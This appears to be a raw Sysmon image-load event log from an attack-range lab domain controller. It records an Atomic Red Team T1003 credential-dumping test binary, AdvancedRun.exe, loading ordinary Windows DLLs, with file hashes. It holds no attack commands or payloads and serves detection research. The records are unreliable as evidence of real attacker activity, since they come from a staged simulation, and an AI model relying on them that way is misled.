17:57:44.950{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000003979840Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.950{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979839Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.950{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979838Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.950{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979837Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.950{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User 
Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979836Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.950{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979835Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.934{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979834Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.934{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000003979833Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.934{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979832Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.934{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979831Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.934{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979830Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:44.934{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979829Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.934{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979828Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.918{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979827Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.918{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security 
Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979826Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.918{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979825Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.918{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979824Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.918{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000003979823Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.918{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979822Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.918{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979821Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.918{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979820Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.918{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime 
LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979819Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.903{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979818Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.903{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979817Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.903{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000003979816Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.887{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979815Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.887{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979814Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.887{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979813Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.887{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version 
Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979812Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.887{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979811Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.887{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979810Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.887{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000003979809Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.871{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979805Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.856{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979804Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.856{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979803Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.856{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 
(rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979802Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.856{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979801Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.856{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979800Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.856{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000003979799Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.856{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979798Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.856{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979797Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.856{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979796Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.856{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 
(rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979795Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.856{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979794Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:44.856{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003979793Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 